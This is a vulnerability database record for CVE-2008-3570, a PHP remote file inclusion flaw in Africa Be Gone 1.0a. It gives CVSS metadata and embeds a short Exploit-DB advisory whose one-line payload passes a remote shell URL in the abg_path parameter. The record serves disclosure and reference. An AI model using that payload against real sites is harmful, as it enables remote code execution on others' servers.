ID CVE-2008-3570
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:31:00
Description
PHP remote file inclusion vulnerability in index.php in Africa Be Gone (ABG) 1.0a allows remote attackers to execute arbitrary PHP code via a URL in the abg_path parameter.
{"id": "CVE-2008-3570", "bulletinFamily": "NVD", "title": "CVE-2008-3570", "description": "PHP remote file inclusion vulnerability in index.php in Africa Be Gone (ABG) 1.0a allows remote attackers to execute arbitrary PHP code via a URL in the abg_path parameter.", "published": "2008-08-10T20:41:00", "modified": "2017-09-29T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3570", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/6183", "http://securityreason.com/securityalert/4124", "https://exchange.xforce.ibmcloud.com/vulnerabilities/44195"], "cvelist": ["CVE-2008-3570"], "type": "cve", "lastseen": "2019-05-29T18:09:27", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "43a03899659cdbf2bd9045bf909185a7"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "1753d2e42a29ae33ac7c59229b49ea15"}, {"key": "cpe23", "hash": "934249c6246c109681f8f2ae5108424d"}, {"key": "cvelist", "hash": "f3ca581148269a0da203495f0a4083f1"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "697763cf5916ecb521e5a8e56e23f6d3"}, {"key": "description", "hash": "b08ff987811a725ae55a97044f7d65e2"}, {"key": "href", "hash": "d16fd143ee09c1b3e096c82fcbd76ef9"}, {"key": "modified", "hash": "b34b097001612caf572dd6c1edf2805b"}, {"key": "published", "hash": "1c88c58410d4964619d4265b5b682e8d"}, {"key": "references", "hash": "0da1e975362715a566322cd76e290947"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "b03521af8c9375c387beb583642f2900"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "dae454610f24de37be6e92aa9d0acdb36e987817c501a42ae6bea9dcb8f92c1c", "viewCount": 0, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2019-05-29T18:09:27"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6183"]}], "modified": "2019-05-29T18:09:27"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "cpe": ["cpe:/a:africabegone:africa_be_gone:1.0a"], "affectedSoftware": [{"name": "africabegone africa_be_gone", "operator": "eq", "version": "1.0a"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:africabegone:africa_be_gone:1.0a:*:*:*:*:*:*:*"], "cwe": ["CWE-94"]}
{"exploitdb": [{"lastseen": "2016-01-31T23:23:26", "bulletinFamily": "exploit", "description": "ABG Blocking Script 1.0a (abg_path) Remote File Inclusion Vulnerability. CVE-2008-3570. Webapps exploit for php platform", "modified": "2008-08-01T00:00:00", "published": "2008-08-01T00:00:00", "id": "EDB-ID:6183", "href": "https://www.exploit-db.com/exploits/6183/", "type": "exploitdb", "title": "ABG Blocking Script 1.0a abg_path Remote File Inclusion Vulnerability", "sourceData": "=================================================================\n========Africa Be Gone version 1.0a Remote File Inclusion========\n=================================================================\n\nVendor: http://www.africabegone.com\nDownload: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1\nDiscovered: 7-31-08\nDiscovered By: Lo$er\n\n====Vulnerable code====\n\n$abg_path is initilizied but overwritten later down the road.\n\n====RFI====\n\nhttp://www.[site].com/[abg path]/index.php?abg_path=[shell]?\n\n# milw0rm.com [2008-08-01]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6183/"}]}